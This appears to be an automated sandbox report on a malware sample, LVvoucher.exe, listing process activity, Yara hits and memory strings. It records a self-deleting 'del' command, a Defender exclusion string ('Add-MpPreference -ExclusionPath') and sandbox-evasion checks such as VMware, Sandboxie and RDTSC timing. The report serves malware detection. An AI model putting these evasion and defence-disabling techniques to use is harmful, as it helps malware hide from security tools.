Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_004012FB push ebx; ret	16_2_004012FC
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_00409BAA push ss; ret	16_2_00409BB0
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_00416BAB push es; ret	16_2_00416BB5
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_00409BAA push ss; ret	16_2_00409BB0
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_0041D4B5 push eax; ret	16_2_0041D508
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_0041D56C push eax; ret	16_2_0041D572
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_0041D502 push eax; ret	16_2_0041D508
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_0041D50B push eax; ret	16_2_0041D572
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047ED0D1 push ecx; ret	23_2_047ED0E4
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_02C89BAA push ss; ret	23_2_02C89BB0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_02C96BAB push es; ret	23_2_02C96BB5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_02C97045 push AE08DEFCh; retf	23_2_02C97038
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_02C97009 push AE08DEFCh; retf	23_2_02C97038
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_02C8F175 push cs; retf	23_2_02C8F176
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_02C9D4B5 push eax; ret	23_2_02C9D508
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_02C9D56C push eax; ret	23_2_02C9D572
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_02C9D50B push eax; ret	23_2_02C9D572
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_02C9D502 push eax; ret	23_2_02C9D508

Source: C:\Windows\SysWOW64\cmstp.exe	Process created: /c del "C:\Users\user\Desktop\LVvoucher.exe"
Source: C:\Windows\SysWOW64\cmstp.exe	Process created: /c del "C:\Users\user\Desktop\LVvoucher.exe"			Jump to behavior

Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: Yara match	File source: 0.2.LVvoucher.exe.2fed0a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.359511322.0000000002FED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.359603340.000000000306C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LVvoucher.exe PID: 6944, type: MEMORYSTR

Source: LVvoucher.exe, 00000000.00000002.359511322.0000000002FED000.00000004.00000800.00020000.00000000.sdmp, LVvoucher.exe, 00000000.00000002.359603340.000000000306C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: LVvoucher.exe, 00000000.00000002.359511322.0000000002FED000.00000004.00000800.00020000.00000000.sdmp, LVvoucher.exe, 00000000.00000002.359603340.000000000306C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\Desktop\LVvoucher.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LVvoucher.exe	RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe	RDTSC instruction interceptor: First address: 0000000002C89904 second address: 0000000002C8990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe	RDTSC instruction interceptor: First address: 0000000002C89B7E second address: 0000000002C89B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\LVvoucher.exe TID: 6948	Thread sleep time: -39532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe TID: 6968	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4468	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmstp.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\LVvoucher.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5343			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3083			Jump to behavior

Source: C:\Users\user\Desktop\LVvoucher.exe	Thread delayed: delay time: 39532	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: LVvoucher.exe, 00000000.00000002.359603340.000000000306C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: LVvoucher.exe, 00000000.00000002.359603340.000000000306C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000012.00000000.373943190.000000000EF31000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000012.00000000.371753438.00000000086C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: LVvoucher.exe, 00000000.00000002.359603340.000000000306C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000012.00000000.404762530.0000000008778000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 00000012.00000000.373943190.000000000EF31000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}veryMan
